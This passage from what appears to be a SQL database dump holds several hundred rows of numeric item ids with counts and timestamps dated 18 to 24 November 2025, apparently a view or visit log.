01:54:57'),(95527,3045,1,'2025-11-18','2025-11-18 02:44:27'),(95528,4977,1,'2025-11-18','2025-11-18 02:55:49'),(95529,3777,1,'2025-11-18','2025-11-18 03:22:19'),(95530,5449,1,'2025-11-18','2025-11-18 03:57:34'),(95531,5436,1,'2025-11-18','2025-11-18 03:57:38'),(95532,72,1,'2025-11-18','2025-11-18 04:05:10'),(95533,1582,1,'2025-11-18','2025-11-18 04:33:16'),(95534,91,1,'2025-11-18','2025-11-18 04:48:27'),(95535,5614,1,'2025-11-18','2025-11-18 05:13:16'),(95536,1582,1,'2025-11-18','2025-11-18 05:15:57'),(95537,1600,1,'2025-11-18','2025-11-18 05:33:53'),(95538,4983,1,'2025-11-18','2025-11-18 05:44:58'),(95539,5461,1,'2025-11-18','2025-11-18 06:09:25'),(95540,5461,1,'2025-11-18','2025-11-18 06:28:54'),(95541,3486,1,'2025-11-18','2025-11-18 06:39:28'),(95542,5570,1,'2025-11-18','2025-11-18 06:58:03'),(95543,89,1,'2025-11-18','2025-11-18 07:09:31'),(95544,2769,1,'2025-11-18','2025-11-18 07:09:55'),(95545,3006,1,'2025-11-18','2025-11-18 07:11:26'),(95546,3041,1,'2025-11-18','2025-11-18 07:11:52'),(95547,89,1,'2025-11-18','2025-11-18 07:12:21'),(95548,1608,1,'2025-11-18','2025-11-18 08:11:20'),(95549,110,1,'2025-11-18','2025-11-18 08:11:56'),(95550,4681,1,'2025-11-18','2025-11-18 08:22:52'),(95551,5464,1,'2025-11-18','2025-11-18 08:39:21'),(95552,4712,1,'2025-11-18','2025-11-18 08:51:53'),(95553,4976,1,'2025-11-18','2025-11-18 09:28:57'),(95554,4980,1,'2025-11-18','2025-11-18 09:40:29'),(95555,1718,1,'2025-11-18','2025-11-18 10:42:20'),(95556,5502,1,'2025-11-18','2025-11-18 10:49:30'),(95557,4963,1,'2025-11-18','2025-11-18 11:20:54'),(95558,1695,1,'2025-11-18','2025-11-18 11:21:33'),(95559,5076,1,'2025-11-18','2025-11-18 12:05:16'),(95560,5489,1,'2025-11-18','2025-11-18 13:24:45'),(95561,4950,1,'2025-11-18','2025-11-18 13:44:06'),(95562,4950,1,'2025-11-18','2025-11-18 14:33:57'),(95563,5631,1,'2025-11-18','2025-11-18 15:36:07'),(95564,4966,1,'2025-11-18','2025-11-18 15:52:07'),(95565,4966,1,'2025-11-18','2025-11-18 15:52:23'),(95566,4911,1,'2025-11-18','2025-11-18 16:03:07'),(95567,483,1,'2025-11-18','2025-11-18 16:14:25'),(95568,4950,1,'2025-11-18','2025-11-18 16:20:26'),(95569,4966,1,'2025-11-18','2025-11-18 16:33:01'),(95570,3307,1,'2025-11-18','2025-11-18 17:16:29'),(95571,4608,1,'2025-11-18','2025-11-18 17:17:36'),(95572,5397,1,'2025-11-18','2025-11-18 17:33:49'),(95573,5515,1,'2025-11-18','2025-11-18 17:36:50'),(95574,3781,1,'2025-11-18','2025-11-18 17:38:52'),(95575,5433,1,'2025-11-18','2025-11-18 17:46:36'),(95576,5457,1,'2025-11-18','2025-11-18 17:47:38'),(95577,5454,1,'2025-11-18','2025-11-18 17:58:34'),(95578,5400,1,'2025-11-18','2025-11-18 18:03:23'),(95579,5425,1,'2025-11-18','2025-11-18 18:09:10'),(95580,5578,1,'2025-11-18','2025-11-18 18:11:18'),(95581,4400,1,'2025-11-18','2025-11-18 18:14:00'),(95582,5412,1,'2025-11-18','2025-11-18 18:22:20'),(95583,5406,1,'2025-11-18','2025-11-18 18:31:50'),(95584,2904,1,'2025-11-18','2025-11-18 18:35:20'),(95585,5428,1,'2025-11-18','2025-11-18 18:36:14'),(95586,5409,1,'2025-11-18','2025-11-18 18:37:57'),(95587,5561,1,'2025-11-18','2025-11-18 18:38:05'),(95588,5441,1,'2025-11-18','2025-11-18 18:41:04'),(95589,5406,1,'2025-11-18','2025-11-18 18:44:03'),(95590,5567,1,'2025-11-18','2025-11-18 18:47:39'),(95591,5420,1,'2025-11-18','2025-11-18 19:07:42'),(95592,5406,1,'2025-11-18','2025-11-18 19:14:18'),(95593,2751,1,'2025-11-18','2025-11-18 19:26:10'),(95594,5492,1,'2025-11-18','2025-11-18 19:35:53'),(95595,3781,1,'2025-11-18','2025-11-18 19:45:24'),(95596,2152,1,'2025-11-18','2025-11-18 20:33:36'),(95597,5492,1,'2025-11-18','2025-11-18 20:40:02'),(95598,467,1,'2025-11-18','2025-11-18 21:37:29'),(95599,5307,1,'2025-11-18','2025-11-18 22:09:22'),(95600,4694,1,'2025-11-19','2025-11-19 03:21:51'),(95601,4950,1,'2025-11-19','2025-11-19 03:36:41'),(95602,2503,1,'2025-11-19','2025-11-19 03:37:21'),(95603,4691,1,'2025-11-19','2025-11-19 03:56:31'),(95604,4911,1,'2025-11-19','2025-11-19 03:59:47'),(95605,4569,1,'2025-11-19','2025-11-19 04:26:10'),(95606,4510,1,'2025-11-19','2025-11-19 04:59:23'),(95607,4762,1,'2025-11-19','2025-11-19 05:06:06'),(95608,468,1,'2025-11-19','2025-11-19 05:06:34'),(95609,4348,1,'2025-11-19','2025-11-19 05:18:27'),(95610,4651,1,'2025-11-19','2025-11-19 05:20:20'),(95611,474,1,'2025-11-19','2025-11-19 05:26:12'),(95612,4494,1,'2025-11-19','2025-11-19 05:36:16'),(95613,4654,1,'2025-11-19','2025-11-19 06:03:05'),(95614,4498,1,'2025-11-19','2025-11-19 06:06:48'),(95615,3777,1,'2025-11-19','2025-11-19 06:27:54'),(95616,91,1,'2025-11-19','2025-11-19 06:44:36'),(95617,470,1,'2025-11-19','2025-11-19 06:55:30'),(95618,4492,1,'2025-11-19','2025-11-19 07:03:56'),(95619,4688,1,'2025-11-19','2025-11-19 07:15:44'),(95620,4489,1,'2025-11-19','2025-11-19 07:16:04'),(95621,473,1,'2025-11-19','2025-11-19 07:16:19'),(95622,4768,1,'2025-11-19','2025-11-19 07:30:20'),(95623,3479,1,'2025-11-19','2025-11-19 08:11:32'),(95624,3006,1,'2025-11-19','2025-11-19 08:46:43'),(95625,5425,1,'2025-11-19','2025-11-19 08:46:45'),(95626,4738,1,'2025-11-19','2025-11-19 09:18:47'),(95627,4496,1,'2025-11-19','2025-11-19 09:24:54'),(95628,4700,1,'2025-11-19','2025-11-19 09:46:14'),(95629,487,1,'2025-11-19','2025-11-19 09:49:11'),(95630,4514,1,'2025-11-19','2025-11-19 09:51:24'),(95631,5397,1,'2025-11-19','2025-11-19 09:52:50'),(95632,4950,1,'2025-11-19','2025-11-19 09:54:58'),(95633,2813,1,'2025-11-19','2025-11-19 10:03:41'),(95634,4950,1,'2025-11-19','2025-11-19 10:08:56'),(95635,80,1,'2025-11-19','2025-11-19 12:31:20'),(95636,5593,1,'2025-11-19','2025-11-19 13:40:04'),(95637,3251,1,'2025-11-19','2025-11-19 15:01:37'),(95638,3083,1,'2025-11-19','2025-11-19 16:06:46'),(95639,2503,1,'2025-11-19','2025-11-19 16:08:10'),(95640,470,1,'2025-11-19','2025-11-19 16:40:28'),(95641,4520,1,'2025-11-19','2025-11-19 16:55:33'),(95642,76,1,'2025-11-19','2025-11-19 17:27:12'),(95643,5502,1,'2025-11-19','2025-11-19 18:04:09'),(95644,5502,1,'2025-11-19','2025-11-19 18:06:04'),(95645,5467,1,'2025-11-19','2025-11-19 18:12:39'),(95646,5128,1,'2025-11-19','2025-11-19 18:25:52'),(95647,87,1,'2025-11-19','2025-11-19 18:44:30'),(95648,4950,1,'2025-11-19','2025-11-19 18:52:12'),(95649,3781,1,'2025-11-19','2025-11-19 18:52:15'),(95650,3069,1,'2025-11-19','2025-11-19 18:59:23'),(95651,5397,1,'2025-11-19','2025-11-19 19:02:26'),(95652,2993,1,'2025-11-19','2025-11-19 19:25:43'),(95653,4591,1,'2025-11-19','2025-11-19 19:31:23'),(95654,5113,1,'2025-11-19','2025-11-19 19:35:42'),(95655,3752,1,'2025-11-19','2025-11-19 19:47:13'),(95656,5593,1,'2025-11-19','2025-11-19 20:04:20'),(95657,76,1,'2025-11-19','2025-11-19 20:18:53'),(95658,4950,1,'2025-11-19','2025-11-19 20:26:23'),(95659,68,1,'2025-11-19','2025-11-19 20:26:33'),(95660,4660,1,'2025-11-19','2025-11-19 21:05:33'),(95661,5570,1,'2025-11-19','2025-11-19 21:21:31'),(95662,5454,1,'2025-11-19','2025-11-19 21:36:43'),(95663,2813,1,'2025-11-19','2025-11-19 21:55:16'),(95664,5409,1,'2025-11-19','2025-11-19 21:56:51'),(95665,4893,1,'2025-11-19','2025-11-19 21:57:46'),(95666,1608,1,'2025-11-19','2025-11-19 21:58:11'),(95667,5109,1,'2025-11-19','2025-11-19 22:12:10'),(95668,1730,1,'2025-11-19','2025-11-19 22:22:38'),(95669,4963,1,'2025-11-19','2025-11-19 22:27:55'),(95670,5425,1,'2025-11-19','2025-11-19 22:33:43'),(95671,5549,1,'2025-11-19','2025-11-19 22:45:45'),(95672,5409,1,'2025-11-19','2025-11-19 22:50:24'),(95673,4893,1,'2025-11-19','2025-11-19 22:50:59'),(95674,4893,1,'2025-11-19','2025-11-19 23:44:09'),(95675,1701,1,'2025-11-19','2025-11-19 23:44:59'),(95676,1724,1,'2025-11-19','2025-11-19 23:45:03'),(95677,5409,1,'2025-11-19','2025-11-19 23:45:45'),(95678,1608,1,'2025-11-19','2025-11-19 23:46:11'),(95679,2813,1,'2025-11-19','2025-11-19 23:47:06'),(95680,4950,1,'2025-11-19','2025-11-19 23:55:42'),(95681,68,1,'2025-11-19','2025-11-19 23:56:29'),(95682,68,1,'2025-11-19','2025-11-19 23:57:05'),(95683,4722,1,'2025-11-20','2025-11-20 00:03:34'),(95684,1722,1,'2025-11-20','2025-11-20 00:28:12'),(95685,4893,1,'2025-11-20','2025-11-20 00:49:48'),(95686,1608,1,'2025-11-20','2025-11-20 00:50:35'),(95687,1724,1,'2025-11-20','2025-11-20 00:50:40'),(95688,5409,1,'2025-11-20','2025-11-20 00:51:25'),(95689,2813,1,'2025-11-20','2025-11-20 00:52:14'),(95690,1701,1,'2025-11-20','2025-11-20 00:52:34'),(95691,3117,1,'2025-11-20','2025-11-20 00:59:30'),(95692,1582,1,'2025-11-20','2025-11-20 01:35:18'),(95693,3038,1,'2025-11-20','2025-11-20 01:37:27'),(95694,5409,1,'2025-11-20','2025-11-20 01:41:34'),(95695,5441,1,'2025-11-20','2025-11-20 01:50:29'),(95696,1608,1,'2025-11-20','2025-11-20 02:05:00'),(95697,5409,1,'2025-11-20','2025-11-20 02:05:38'),(95698,2813,1,'2025-11-20','2025-11-20 02:06:01'),(95699,1724,1,'2025-11-20','2025-11-20 02:06:58'),(95700,3664,1,'2025-11-20','2025-11-20 02:10:27'),(95701,4608,1,'2025-11-20','2025-11-20 02:18:56'),(95702,1608,1,'2025-11-20','2025-11-20 03:11:19'),(95703,2813,1,'2025-11-20','2025-11-20 03:12:02'),(95704,1701,1,'2025-11-20','2025-11-20 03:12:32'),(95705,1724,1,'2025-11-20','2025-11-20 03:13:03'),(95706,4893,1,'2025-11-20','2025-11-20 03:13:47'),(95707,4960,1,'2025-11-20','2025-11-20 03:23:15'),(95708,3083,1,'2025-11-20','2025-11-20 03:40:07'),(95709,1701,1,'2025-11-20','2025-11-20 04:23:15'),(95710,4893,1,'2025-11-20','2025-11-20 04:24:31'),(95711,4344,1,'2025-11-20','2025-11-20 04:34:21'),(95712,80,1,'2025-11-20','2025-11-20 04:39:15'),(95713,5409,1,'2025-11-20','2025-11-20 05:07:18'),(95714,72,1,'2025-11-20','2025-11-20 05:39:29'),(95715,5420,1,'2025-11-20','2025-11-20 05:57:19'),(95716,5461,1,'2025-11-20','2025-11-20 06:05:55'),(95717,5601,1,'2025-11-20','2025-11-20 06:41:50'),(95718,80,1,'2025-11-20','2025-11-20 06:53:06'),(95719,4983,1,'2025-11-20','2025-11-20 07:13:57'),(95720,1544,1,'2025-11-20','2025-11-20 07:26:19'),(95721,4485,1,'2025-11-20','2025-11-20 07:36:00'),(95722,5420,1,'2025-11-20','2025-11-20 07:57:46'),(95723,5582,1,'2025-11-20','2025-11-20 08:03:48'),(95724,4556,1,'2025-11-20','2025-11-20 08:22:46'),(95725,4556,1,'2025-11-20','2025-11-20 08:22:57'),(95726,4722,1,'2025-11-20','2025-11-20 08:29:53'),(95727,5461,1,'2025-11-20','2025-11-20 08:34:04'),(95728,3486,1,'2025-11-20','2025-11-20 08:47:26'),(95729,4960,1,'2025-11-20','2025-11-20 08:53:14'),(95730,5454,1,'2025-11-20','2025-11-20 09:10:52'),(95731,4238,1,'2025-11-20','2025-11-20 09:28:03'),(95732,91,1,'2025-11-20','2025-11-20 09:39:53'),(95733,3742,1,'2025-11-20','2025-11-20 10:19:12'),(95734,4677,1,'2025-11-20','2025-11-20 10:36:52'),(95735,72,1,'2025-11-20','2025-11-20 10:42:33'),(95736,3127,1,'2025-11-20','2025-11-20 10:48:48'),(95737,5323,1,'2025-11-20','2025-11-20 10:59:50'),(95738,110,1,'2025-11-20','2025-11-20 11:05:03'),(95739,5101,1,'2025-11-20','2025-11-20 11:13:46'),(95740,4681,1,'2025-11-20','2025-11-20 11:18:16'),(95741,5512,1,'2025-11-20','2025-11-20 11:33:23'),(95742,5276,1,'2025-11-20','2025-11-20 12:02:54'),(95743,3721,1,'2025-11-20','2025-11-20 12:17:00'),(95744,1745,1,'2025-11-20','2025-11-20 12:19:49'),(95745,5317,1,'2025-11-20','2025-11-20 12:48:38'),(95746,470,1,'2025-11-20','2025-11-20 13:50:24'),(95747,4950,1,'2025-11-20','2025-11-20 13:57:15'),(95748,76,1,'2025-11-20','2025-11-20 15:19:17'),(95749,4950,1,'2025-11-20','2025-11-20 15:45:23'),(95750,1728,1,'2025-11-20','2025-11-20 15:59:46'),(95751,5553,1,'2025-11-20','2025-11-20 16:14:51'),(95752,1544,1,'2025-11-20','2025-11-20 16:32:05'),(95753,91,1,'2025-11-20','2025-11-20 16:32:46'),(95754,5140,1,'2025-11-20','2025-11-20 16:37:03'),(95755,76,1,'2025-11-20','2025-11-20 16:44:24'),(95756,87,1,'2025-11-20','2025-11-20 16:47:28'),(95757,482,1,'2025-11-20','2025-11-20 16:47:40'),(95758,481,1,'2025-11-20','2025-11-20 16:47:54'),(95759,89,1,'2025-11-20','2025-11-20 16:56:17'),(95760,89,1,'2025-11-20','2025-11-20 16:57:02'),(95761,89,1,'2025-11-20','2025-11-20 16:57:44'),(95762,2704,1,'2025-11-20','2025-11-20 17:14:42'),(95763,467,1,'2025-11-20','2025-11-20 18:54:59'),(95764,5409,1,'2025-11-20','2025-11-20 19:01:56'),(95765,5515,1,'2025-11-20','2025-11-20 19:14:39'),(95766,5433,1,'2025-11-20','2025-11-20 19:37:05'),(95767,1872,1,'2025-11-20','2025-11-20 19:54:30'),(95768,1872,1,'2025-11-20','2025-11-20 19:54:32'),(95769,5353,1,'2025-11-20','2025-11-20 20:10:13'),(95770,5320,1,'2025-11-20','2025-11-20 20:29:51'),(95771,5425,1,'2025-11-20','2025-11-20 20:42:48'),(95772,5512,1,'2025-11-20','2025-11-20 20:52:13'),(95773,5457,1,'2025-11-20','2025-11-20 20:52:19'),(95774,4703,1,'2025-11-20','2025-11-20 21:05:41'),(95775,2769,1,'2025-11-20','2025-11-20 21:10:09'),(95776,1544,1,'2025-11-20','2025-11-20 21:28:11'),(95777,76,1,'2025-11-20','2025-11-20 21:30:21'),(95778,5400,1,'2025-11-20','2025-11-20 22:13:28'),(95779,4529,1,'2025-11-20','2025-11-20 22:16:22'),(95780,80,1,'2025-11-20','2025-11-20 22:23:57'),(95781,68,1,'2025-11-20','2025-11-20 22:24:36'),(95782,108,1,'2025-11-20','2025-11-20 22:25:13'),(95783,1582,1,'2025-11-20','2025-11-20 22:28:56'),(95784,3710,1,'2025-11-20','2025-11-20 22:43:13'),(95785,5320,1,'2025-11-20','2025-11-20 22:44:01'),(95786,5578,1,'2025-11-20','2025-11-20 23:03:12'),(95787,4400,1,'2025-11-20','2025-11-20 23:32:14'),(95788,5489,1,'2025-11-21','2025-11-21 00:00:35'),(95789,470,1,'2025-11-21','2025-11-21 00:03:02'),(95790,5412,1,'2025-11-21','2025-11-21 00:09:13'),(95791,2809,1,'2025-11-21','2025-11-21 00:34:33'),(95792,5406,1,'2025-11-21','2025-11-21 00:49:18'),(95793,2904,1,'2025-11-21','2025-11-21 00:59:53'),(95794,5428,1,'2025-11-21','2025-11-21 01:04:15'),(95795,5561,1,'2025-11-21','2025-11-21 01:06:34'),(95796,5125,1,'2025-11-21','2025-11-21 01:06:39'),(95797,3045,1,'2025-11-21','2025-11-21 01:10:09'),(95798,5567,1,'2025-11-21','2025-11-21 01:14:25'),(95799,4977,1,'2025-11-21','2025-11-21 01:22:15'),(95800,5436,1,'2025-11-21','2025-11-21 01:30:17'),(95801,5449,1,'2025-11-21','2025-11-21 01:30:31'),(95802,4977,1,'2025-11-21','2025-11-21 01:37:43'),(95803,5428,1,'2025-11-21','2025-11-21 01:44:02'),(95804,5492,1,'2025-11-21','2025-11-21 01:51:35'),(95805,4712,1,'2025-11-21','2025-11-21 01:59:17'),(95806,5464,1,'2025-11-21','2025-11-21 02:00:47'),(95807,3282,1,'2025-11-21','2025-11-21 02:25:08'),(95808,5400,1,'2025-11-21','2025-11-21 02:33:57'),(95809,1703,1,'2025-11-21','2025-11-21 02:38:30'),(95810,2804,1,'2025-11-21','2025-11-21 03:14:24'),(95811,4612,1,'2025-11-21','2025-11-21 03:27:17'),(95812,1544,1,'2025-11-21','2025-11-21 03:30:04'),(95813,4950,1,'2025-11-21','2025-11-21 03:32:44'),(95814,4738,1,'2025-11-21','2025-11-21 03:34:39'),(95815,4329,1,'2025-11-21','2025-11-21 04:24:25'),(95816,4858,1,'2025-11-21','2025-11-21 06:59:59'),(95817,5067,1,'2025-11-21','2025-11-21 07:29:16'),(95818,1739,1,'2025-11-21','2025-11-21 08:07:15'),(95819,2775,1,'2025-11-21','2025-11-21 08:43:58'),(95820,4587,1,'2025-11-21','2025-11-21 08:58:56'),(95821,3034,1,'2025-11-21','2025-11-21 09:09:00'),(95822,4685,1,'2025-11-21','2025-11-21 09:28:47'),(95823,1590,1,'2025-11-21','2025-11-21 09:32:46'),(95824,1606,1,'2025-11-21','2025-11-21 09:38:47'),(95825,89,1,'2025-11-21','2025-11-21 09:39:40'),(95826,91,1,'2025-11-21','2025-11-21 11:09:20'),(95827,3664,1,'2025-11-21','2025-11-21 11:50:28'),(95828,68,1,'2025-11-21','2025-11-21 12:54:21'),(95829,4944,1,'2025-11-21','2025-11-21 13:57:04'),(95830,3259,1,'2025-11-21','2025-11-21 14:02:54'),(95831,4996,1,'2025-11-21','2025-11-21 14:22:38'),(95832,4950,1,'2025-11-21','2025-11-21 14:46:42'),(95833,110,1,'2025-11-21','2025-11-21 15:18:41'),(95834,76,1,'2025-11-21','2025-11-21 15:19:35'),(95835,74,1,'2025-11-21','2025-11-21 15:19:40'),(95836,91,1,'2025-11-21','2025-11-21 15:19:57'),(95837,91,1,'2025-11-21','2025-11-21 15:23:21'),(95838,1728,1,'2025-11-21','2025-11-21 16:24:52'),(95839,2297,1,'2025-11-21','2025-11-21 16:38:47'),(95840,5406,1,'2025-11-21','2025-11-21 16:54:02'),(95841,2161,1,'2025-11-21','2025-11-21 17:45:22'),(95842,469,1,'2025-11-21','2025-11-21 18:12:41'),(95843,3531,1,'2025-11-21','2025-11-21 18:46:00'),(95844,3781,1,'2025-11-21','2025-11-21 18:47:20'),(95845,5397,1,'2025-11-21','2025-11-21 18:57:05'),(95846,5515,1,'2025-11-21','2025-11-21 19:03:05'),(95847,5433,1,'2025-11-21','2025-11-21 19:06:38'),(95848,3072,1,'2025-11-21','2025-11-21 19:09:25'),(95849,5553,1,'2025-11-21','2025-11-21 19:37:18'),(95850,5383,1,'2025-11-21','2025-11-21 20:03:34'),(95851,4966,1,'2025-11-21','2025-11-21 20:18:00'),(95852,1582,1,'2025-11-21','2025-11-21 20:22:58'),(95853,3430,1,'2025-11-21','2025-11-21 20:28:41'),(95854,4400,1,'2025-11-21','2025-11-21 20:58:32'),(95855,4238,1,'2025-11-21','2025-11-21 21:18:39'),(95856,5400,1,'2025-11-21','2025-11-21 22:10:51'),(95857,4529,1,'2025-11-21','2025-11-21 22:10:53'),(95858,2410,1,'2025-11-21','2025-11-21 22:13:54'),(95859,487,1,'2025-11-21','2025-11-21 23:23:56'),(95860,80,1,'2025-11-21','2025-11-21 23:24:02'),(95861,68,1,'2025-11-21','2025-11-21 23:24:12'),(95862,1582,1,'2025-11-21','2025-11-21 23:41:01'),(95863,4400,1,'2025-11-21','2025-11-21 23:50:36'),(95864,5412,1,'2025-11-22','2025-11-22 00:59:51'),(95865,84,1,'2025-11-22','2025-11-22 01:18:47'),(95866,1604,1,'2025-11-22','2025-11-22 01:29:58'),(95867,2804,1,'2025-11-22','2025-11-22 01:37:45'),(95868,4717,1,'2025-11-22','2025-11-22 01:57:26'),(95869,5428,1,'2025-11-22','2025-11-22 02:09:25'),(95870,4971,1,'2025-11-22','2025-11-22 02:32:28'),(95871,5409,1,'2025-11-22','2025-11-22 02:37:15'),(95872,5280,1,'2025-11-22','2025-11-22 03:01:58'),(95873,5122,1,'2025-11-22','2025-11-22 03:11:14'),(95874,3045,1,'2025-11-22','2025-11-22 03:51:16'),(95875,4551,1,'2025-11-22','2025-11-22 04:09:09'),(95876,4977,1,'2025-11-22','2025-11-22 04:30:40'),(95877,1582,1,'2025-11-22','2025-11-22 04:37:23'),(95878,4771,1,'2025-11-22','2025-11-22 04:45:25'),(95879,5449,1,'2025-11-22','2025-11-22 05:22:20'),(95880,72,1,'2025-11-22','2025-11-22 05:33:29'),(95881,1582,1,'2025-11-22','2025-11-22 05:35:56'),(95882,4556,1,'2025-11-22','2025-11-22 06:11:40'),(95883,3486,1,'2025-11-22','2025-11-22 06:58:29'),(95884,5492,1,'2025-11-22','2025-11-22 07:06:38'),(95885,80,1,'2025-11-22','2025-11-22 07:42:21'),(95886,4712,1,'2025-11-22','2025-11-22 08:00:30'),(95887,1705,1,'2025-11-22','2025-11-22 08:29:30'),(95888,1582,1,'2025-11-22','2025-11-22 08:36:38'),(95889,5495,1,'2025-11-22','2025-11-22 08:48:39'),(95890,4404,1,'2025-11-22','2025-11-22 09:12:18'),(95891,5578,1,'2025-11-22','2025-11-22 09:16:33'),(95892,1728,1,'2025-11-22','2025-11-22 09:32:51'),(95893,4440,1,'2025-11-22','2025-11-22 10:28:18'),(95894,2801,1,'2025-11-22','2025-11-22 11:15:49'),(95895,91,1,'2025-11-22','2025-11-22 11:45:07'),(95896,3261,1,'2025-11-22','2025-11-22 11:48:20'),(95897,1582,1,'2025-11-22','2025-11-22 12:30:40'),(95898,2419,1,'2025-11-22','2025-11-22 14:06:15'),(95899,5146,1,'2025-11-22','2025-11-22 15:06:25'),(95900,1582,1,'2025-11-22','2025-11-22 16:14:53'),(95901,3267,1,'2025-11-22','2025-11-22 16:27:03'),(95902,4950,1,'2025-11-22','2025-11-22 16:58:48'),(95903,4966,1,'2025-11-22','2025-11-22 17:24:58'),(95904,5502,1,'2025-11-22','2025-11-22 18:03:58'),(95905,3307,1,'2025-11-22','2025-11-22 18:04:04'),(95906,5449,1,'2025-11-22','2025-11-22 18:23:23'),(95907,5400,1,'2025-11-22','2025-11-22 18:27:22'),(95908,5363,1,'2025-11-22','2025-11-22 18:36:09'),(95909,3069,1,'2025-11-22','2025-11-22 18:47:21'),(95910,5428,1,'2025-11-22','2025-11-22 18:59:01'),(95911,3752,1,'2025-11-22','2025-11-22 19:05:29'),(95912,5042,1,'2025-11-22','2025-11-22 19:12:39'),(95913,467,1,'2025-11-22','2025-11-22 19:22:57'),(95914,3781,1,'2025-11-22','2025-11-22 19:26:33'),(95915,5512,1,'2025-11-22','2025-11-22 19:45:32'),(95916,5457,1,'2025-11-22','2025-11-22 19:45:48'),(95917,4660,1,'2025-11-22','2025-11-22 20:03:54'),(95918,2159,1,'2025-11-22','2025-11-22 20:04:36'),(95919,1582,1,'2025-11-22','2025-11-22 20:08:01'),(95920,5570,1,'2025-11-22','2025-11-22 20:20:12'),(95921,5626,1,'2025-11-22','2025-11-22 20:34:56'),(95922,5454,1,'2025-11-22','2025-11-22 20:45:06'),(95923,4797,1,'2025-11-22','2025-11-22 20:48:13'),(95924,5425,1,'2025-11-22','2025-11-22 21:28:42'),(95925,1707,1,'2025-11-22','2025-11-22 21:38:53'),(95926,4960,1,'2025-11-22','2025-11-22 21:42:22'),(95927,4238,1,'2025-11-22','2025-11-22 21:48:31'),(95928,4238,1,'2025-11-22','2025-11-22 21:54:25'),(95929,4238,1,'2025-11-22','2025-11-22 21:54:53'),(95930,5578,1,'2025-11-22','2025-11-22 21:55:00'),(95931,4238,1,'2025-11-22','2025-11-22 22:09:31'),(95932,5489,1,'2025-11-22','2025-11-22 22:38:05'),(95933,4722,1,'2025-11-22','2025-11-22 22:50:28'),(95934,1703,1,'2025-11-22','2025-11-22 22:59:18'),(95935,5406,1,'2025-11-22','2025-11-22 23:17:00'),(95936,3117,1,'2025-11-22','2025-11-22 23:36:01'),(95937,2904,1,'2025-11-22','2025-11-22 23:48:11'),(95938,3038,1,'2025-11-23','2025-11-23 00:06:01'),(95939,5441,1,'2025-11-23','2025-11-23 00:08:46'),(95940,5561,1,'2025-11-23','2025-11-23 00:09:55'),(95941,5125,1,'2025-11-23','2025-11-23 00:15:51'),(95942,4618,1,'2025-11-23','2025-11-23 00:47:51'),(95943,5567,1,'2025-11-23','2025-11-23 00:52:38'),(95944,5397,1,'2025-11-23','2025-11-23 01:38:54'),(95945,5436,1,'2025-11-23','2025-11-23 02:29:13'),(95946,5631,1,'2025-11-23','2025-11-23 02:34:00'),(95947,5420,1,'2025-11-23','2025-11-23 02:43:52'),(95948,5626,1,'2025-11-23','2025-11-23 02:47:37'),(95949,5549,1,'2025-11-23','2025-11-23 03:22:32'),(95950,4983,1,'2025-11-23','2025-11-23 03:44:13'),(95951,5461,1,'2025-11-23','2025-11-23 04:12:55'),(95952,5131,1,'2025-11-23','2025-11-23 04:44:12'),(95953,5163,1,'2025-11-23','2025-11-23 04:48:03'),(95954,1544,1,'2025-11-23','2025-11-23 05:08:44'),(95955,1544,1,'2025-11-23','2025-11-23 05:09:01'),(95956,76,1,'2025-11-23','2025-11-23 05:09:29'),(95957,4688,1,'2025-11-23','2025-11-23 05:32:03'),(95958,110,1,'2025-11-23','2025-11-23 05:43:32'),(95959,4681,1,'2025-11-23','2025-11-23 05:46:29'),(95960,5464,1,'2025-11-23','2025-11-23 05:56:06'),(95961,3790,1,'2025-11-23','2025-11-23 06:15:46'),(95962,5301,1,'2025-11-23','2025-11-23 06:16:59'),(95963,4508,1,'2025-11-23','2025-11-23 06:38:17'),(95964,4569,1,'2025-11-23','2025-11-23 07:46:36'),(95965,5397,1,'2025-11-23','2025-11-23 07:52:55'),(95966,5457,1,'2025-11-23','2025-11-23 08:32:48'),(95967,68,1,'2025-11-23','2025-11-23 08:38:05'),(95968,3430,1,'2025-11-23','2025-11-23 09:14:52'),(95969,3731,1,'2025-11-23','2025-11-23 09:40:38'),(95970,4983,1,'2025-11-23','2025-11-23 12:03:24'),(95971,91,1,'2025-11-23','2025-11-23 12:48:56'),(95972,4717,1,'2025-11-23','2025-11-23 14:04:41'),(95973,2420,1,'2025-11-23','2025-11-23 15:35:13'),(95974,4941,1,'2025-11-23','2025-11-23 17:05:47'),(95975,5502,1,'2025-11-23','2025-11-23 17:48:58'),(95976,5515,1,'2025-11-23','2025-11-23 18:35:36'),(95977,3752,1,'2025-11-23','2025-11-23 18:41:54'),(95978,5457,1,'2025-11-23','2025-11-23 18:48:13'),(95979,5570,1,'2025-11-23','2025-11-23 18:55:55'),(95980,5425,1,'2025-11-23','2025-11-23 19:03:23'),(95981,5578,1,'2025-11-23','2025-11-23 19:06:38'),(95982,4400,1,'2025-11-23','2025-11-23 19:06:41'),(95983,5489,1,'2025-11-23','2025-11-23 19:11:35'),(95984,5412,1,'2025-11-23','2025-11-23 19:15:02'),(95985,5157,1,'2025-11-23','2025-11-23 19:20:37'),(95986,5157,1,'2025-11-23','2025-11-23 19:21:21'),(95987,3117,1,'2025-11-23','2025-11-23 19:22:23'),(95988,2904,1,'2025-11-23','2025-11-23 19:26:04'),(95989,3038,1,'2025-11-23','2025-11-23 19:26:37'),(95990,5561,1,'2025-11-23','2025-11-23 19:26:45'),(95991,5441,1,'2025-11-23','2025-11-23 19:32:34'),(95992,80,1,'2025-11-23','2025-11-23 19:32:37'),(95993,1586,1,'2025-11-23','2025-11-23 19:38:07'),(95994,4977,1,'2025-11-23','2025-11-23 19:48:58'),(95995,5420,1,'2025-11-23','2025-11-23 19:51:12'),(95996,5461,1,'2025-11-23','2025-11-23 20:03:52'),(95997,3486,1,'2025-11-23','2025-11-23 20:04:01'),(95998,110,1,'2025-11-23','2025-11-23 20:16:52'),(95999,5464,1,'2025-11-23','2025-11-23 20:18:16'),(96000,4944,1,'2025-11-23','2025-11-23 21:00:16'),(96001,1596,1,'2025-11-23','2025-11-23 23:26:51'),(96002,1612,1,'2025-11-23','2025-11-23 23:57:58'),(96003,5397,1,'2025-11-24','2025-11-24 00:14:29'),(96004,5567,1,'2025-11-24','2025-11-24 00:20:04'),(96005,1582,1,'2025-11-24','2025-11-24 00:45:22'),(96006,87,1,'2025-11-24','2025-11-24 00:54:58'),(96007,84,1,'2025-11-24','2025-11-24 00:54:58'),(96008,2165,1,'2025-11-24','2025-11-24 01:10:55'),(96009,5454,1,'2025-11-24','2025-11-24 03:25:53'),(96010,80,1,'2025-11-24','2025-11-24 03:43:00'),(96011,4960,1,'2025-11-24','2025-11-24 03:47:04'),(96012,4608,1,'2025-11-24','2025-11-24 